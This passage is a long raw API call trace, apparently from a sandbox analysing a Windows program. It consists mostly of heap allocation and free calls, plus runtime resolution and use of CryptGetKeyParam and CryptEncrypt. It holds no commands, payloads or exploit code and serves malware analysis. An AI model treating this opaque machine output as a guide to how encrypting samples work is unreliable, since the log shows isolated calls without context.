hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0180.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0180.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0180.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0180.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0180.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0180.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0180.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0180.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0180.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0180.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0180.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0180.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0180.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0180.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0180.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0180.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0180.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0180.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0180.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0180.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0180.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0180.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0180.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0180.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0180.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0180.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0180.327] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0180.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0180.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0180.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0180.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0180.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.329] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0180.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0180.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0180.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0180.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0180.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0180.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0180.329] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2838, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2838*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0180.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0180.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0180.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0180.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.331] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.332] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0180.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0180.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0180.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0180.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.332] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.332] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.332] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.332] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0180.333] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.333] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.333] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.333] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.333] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.333] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.333] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.333] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.334] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x5acd, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x5ad0) returned 1 [0180.334] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.334] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.334] PeekMessageW (in: 